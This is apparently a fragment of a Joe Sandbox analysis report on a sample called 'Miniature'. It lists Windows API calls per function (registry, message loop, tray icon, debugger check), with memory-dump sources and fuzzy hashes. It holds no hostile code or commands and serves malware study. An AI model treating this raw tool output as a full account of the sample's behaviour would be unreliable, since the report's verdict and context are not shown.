                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9419571408304AAC711EB60DC45FDF77ECAF86320F10462EF599921A1EB749A89EB96

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1053 c158cb-c158d6 1054 c15948-c1594a 1053->1054 1055 c158d8-c158dd 1053->1055 1056 c1593b-c1593e 1054->1056 1055->1054 1057 c158df-c158f7 RegOpenKeyExW 1055->1057 1057->1054 1058 c158f9-c15918 RegQueryValueExW 1057->1058 1059 c1591a-c15925 1058->1059 1060 c1592f-c1593a RegCloseKey 1058->1060 1061 c15927-c15929 1059->1061 1062 c1593f-c15946 1059->1062 1060->1056 1063 c1592d 1061->1063 1062->1063 1063->1060
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C158BE,SwapMouseButtons,00000004,?), ref: 00C158EF
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C158BE,SwapMouseButtons,00000004,?), ref: 00C15910
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00C158BE,SwapMouseButtons,00000004,?), ref: 00C15932
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                            • Opcode ID: 7ba696f9cb5e8b18dab1897ddca3b26278e7a165db05f364ec4bc1156f23d24a
                                                                                                                                                                                                                                                                                            • Instruction ID: 9d51ada8cf87188f251b646d843ef306d255fbe108411065dd98b78da63dec6c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba696f9cb5e8b18dab1897ddca3b26278e7a165db05f364ec4bc1156f23d24a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C115A75510618FFDB218F64CC80AEEB7B8EF42764F108419F802E7210E2319E82E761
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Variable must be of type 'Object'., xrefs: 00C648C6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                            • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                            • Opcode ID: c70269c9dcd5bc484a25fbb9df086f42c560d6b4ad599967cd16cb6b9bd990b6
                                                                                                                                                                                                                                                                                            • Instruction ID: faa411246b8b290207c95d4c0a6867952e796543b6516c164a784479fc5afce6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c70269c9dcd5bc484a25fbb9df086f42c560d6b4ad599967cd16cb6b9bd990b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CC28E71E00215DFCB24DF58D890BADB7F1BF0A710F248169E915AB391D375AE82EB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C215F2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c3674dc201886e10ceb5bacaeac2a7dd8607c963d19439ddad053c623839b6b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 5e4d14295a669e7c9c8891967541879c09e21a70da5912c44b9f49a9298a01d6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3674dc201886e10ceb5bacaeac2a7dd8607c963d19439ddad053c623839b6b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EB27C74A08360CFCB24CF19E490A2AB7E1BF99300F24495EF9958B752D771EE41DB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C309D8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C33614: RaiseException.KERNEL32(?,?,?,00C309FA,?,00000000,?,?,?,?,?,?,00C309FA,00000000,00CD9758,00000000), ref: 00C33674
                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C309F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                            • Opcode ID: 437e225d1a142960e678e00195174bdb68f9c4f3993adf7b640bea375ea28c11
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c61d1e7e46044fce33a410b7e0a484b713d2c4795674e3f5ba69e4a9a05400a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 437e225d1a142960e678e00195174bdb68f9c4f3993adf7b640bea375ea28c11
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0C23692030CBB8B00BAA9EC66A9E777C5E00350F704121BA24965D2FB71EB55D6D0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C98D52
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00C98D59
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C98F3A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 80fbfe40d0e9dda8bd9e0e1995722f08a34b0ef204bc36fde30305c36b72ba40
                                                                                                                                                                                                                                                                                            • Instruction ID: 7033119e239eb23609950ca568f4b38649cc93bf441e3726a1204ee5ea85711f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80fbfe40d0e9dda8bd9e0e1995722f08a34b0ef204bc36fde30305c36b72ba40
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE126C719083419FCB14DF28C488B6ABBE5FF85314F14895DE8998B392CB31ED49CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fe3582fc240c386eda5558c168ade53cf27b761d66e970dc8ae1b84c291779b3
                                                                                                                                                                                                                                                                                            • Instruction ID: d8a424873e3d9363c62663ae3cb07056b008ebf5cbe4b8447917c2d6c915e2b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe3582fc240c386eda5558c168ade53cf27b761d66e970dc8ae1b84c291779b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A17831604205EFCB18DF18D4D59A9BBA1FF4A314B6084ADF81A8F692DB31ED52DB80
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C132AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C132B7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C132C2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C132CD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C132D5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C132DD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13205: RegisterWindowMessageW.USER32(00000004,?,00C12964), ref: 00C1325D
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C12A0A
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 00C12A28
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00C53A0D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4af6c016bd2631947bcbd0d232367e6ad82fb0d44d5fa5bf37d71d1d680d5087
                                                                                                                                                                                                                                                                                            • Instruction ID: 586b6de99626f98ae0b608ccfaaae034ad0941c5365b1cbd6d96d453711b91b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4af6c016bd2631947bcbd0d232367e6ad82fb0d44d5fa5bf37d71d1d680d5087
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8718EF19023C58E8798EF79EEE675D3AECFB49304350452AE019CB2A1EBB04481EF55
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C16299
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00C2FD36
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C2FD45
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C6FE33
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,00C4894C,?,00CD9CE8,0000000C), ref: 00C48A84
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C4894C,?,00CD9CE8,0000000C), ref: 00C48A8E
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C48AB9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C497BA,FF8BC369,00000000,00000002,00000000), ref: 00C49744
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C497BA,FF8BC369,00000000,00000002,00000000,?,00C45ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C36F41), ref: 00C4974E
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C49755
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C1F27B
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C1F289
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1F29F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C1F2B1
                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00C632D8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C23006
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: def5ac035eba99b9a87b6546bfdb0881c1e5bafde9e9248550b6276475543410
                                                                                                                                                                                                                                                                                            • Instruction ID: 8fea99b4850ca14021902c63e7776707ba7953c6b6987c438db6d65d1329e67d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: def5ac035eba99b9a87b6546bfdb0881c1e5bafde9e9248550b6276475543410
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0432E171A00215DFCB20EF54D891BAEB7B4FF15314F188558F865AB2A1DB31EE80EB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00C5413B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C13A76
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                                            • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                            • Opcode ID: b63219426261c3becce5666e51c482a00feae9769f88a1c7503d10ae0ec82cd2
                                                                                                                                                                                                                                                                                            • Instruction ID: 08b8ecaaa5a6463e4ff2f731a18150f37e001c7010141fd88c97e926e0a781ae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b63219426261c3becce5666e51c482a00feae9769f88a1c7503d10ae0ec82cd2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD219371A042989BDF01DF94C805BEE7BFCAF4A314F00805AE545A7281DBB49ACDAF61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13A3C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 819da3ef009141b87df34c9b20fdb6f56ae1bbaada99cbaee26fca4d6465e7e6
                                                                                                                                                                                                                                                                                            • Instruction ID: c4be7427ae613b92179361e7375d23be890fe50097df8d927188d9ccf87edcbd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 819da3ef009141b87df34c9b20fdb6f56ae1bbaada99cbaee26fca4d6465e7e6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8031B1705043408FD720DF24D8857DBBBE8FF4A318F00092EE6DA87250E775AA88DB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 00C1333D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C132FB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C13312
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C13368,?), ref: 00C133BB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C13368,?), ref: 00C133CE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CE2418,00CE2400,?,?,?,?,?,?,00C13368,?), ref: 00C1343A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C134BB
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C13377
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                            • Opcode ID: eac1d0b0423e9bc21b0ebb8ae4a9e50a22d50be55951ee7d26b9f8aee2e5fa18
                                                                                                                                                                                                                                                                                            • Instruction ID: a047efff8822278802963d7c57920be1ce65488801cc4888435d4abc10f04f81
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eac1d0b0423e9bc21b0ebb8ae4a9e50a22d50be55951ee7d26b9f8aee2e5fa18
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF05E719983C49FD3006F60EC8AB7C37ACA70171DF044915B90A8E1F2CBBA95A1AF44
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleSleep
